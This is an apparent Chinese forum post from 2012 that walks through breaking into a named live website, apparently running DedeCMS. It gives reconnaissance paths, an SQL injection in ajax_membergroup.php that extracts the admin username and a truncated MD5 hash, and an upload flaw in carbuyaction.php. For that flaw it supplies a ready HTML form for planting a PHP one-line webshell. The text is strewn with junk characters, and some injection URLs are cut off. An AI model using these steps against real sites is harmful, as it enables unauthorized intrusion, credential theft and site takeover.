①注入漏洞。
! \# {; @5 I5 S0 V& [# U这站 http://www.political-security.com/
4 t% k0 G. G& ^2 R首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
0 k4 F: C4 [0 k. P' A/ B( Lwww.political-security.com/data/mysql_error_trace.inc 爆后台
$ ~) w3 a5 O1 C0 {. l) q然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
- K4 \+ N8 |0 n: ?, S) F然后写上语句 7 z( J# r' p9 _5 [% t
查看管理员帐号5 R; n0 l2 ^# m" {
http://www.political-security.co ... &membergroup=@`
! ]0 ]% i6 E: g" n$ e# g `, t( U$ ?
admin + T N8 ?" M9 D- v
& ], E: x0 [" v
查看管理员密码
9 |& J- S3 m. \0 e2 K http://www.political-security.co ... &membergroup=@`
( L5 \4 g1 m3 v* k* Q
) X. S/ ^3 Y1 R8d29b1ef9f8c5a5af4290 X9 J- L- {) ^& e( n: ]
3 h6 g+ [8 c! T$ _6 ^查看管理员密码9 q- B; j- v" M0 g
$ t. b7 p% D, I3 g) x* X* }0 \/ W
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD56 C6 n9 U: J0 o* r
; [) x4 }+ t# Q- f
8d2
! D, P' S! F4 U# x; C+ ^) @9b1ef9f8c5a5af42
i: d- ^' H' i, r4 e" g4 q9
# o& h7 q9 y: d G3 U5 O! c m P. j5 ]7 O' M: d/ t
cmd5没解出来 只好测试第二个方法
# h' i0 F \* q5 C# q
, k9 v3 B9 T5 G1 K' `
& I5 w1 @5 H4 E4 |# `; k②上传漏洞:+ _6 ~& B2 I2 R! q/ f. m5 E
5 p* {5 k/ R7 f3 A E* ~! H只要登陆会员中心,然后访问页面链接$ t% y) m- c2 Q! C5 ], s9 r4 n
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 S3 A! w* ?/ n+ {+ A* [' s# ]0 f1 y" O" n, t9 }0 C i2 p
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”8 @- G$ R9 ~: T+ Z3 R7 S. Q: q0 H8 S
9 M' s& w' H0 [- M& ^1 b/ L; k& O于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
* S C- v2 J( r( f
8 ?* `& `+ O4 [( D. G<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>9 w* o- ~% `, k6 C6 B& u/ {: @5 H
或者( l9 e# m" o% s2 r; z* U8 H
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对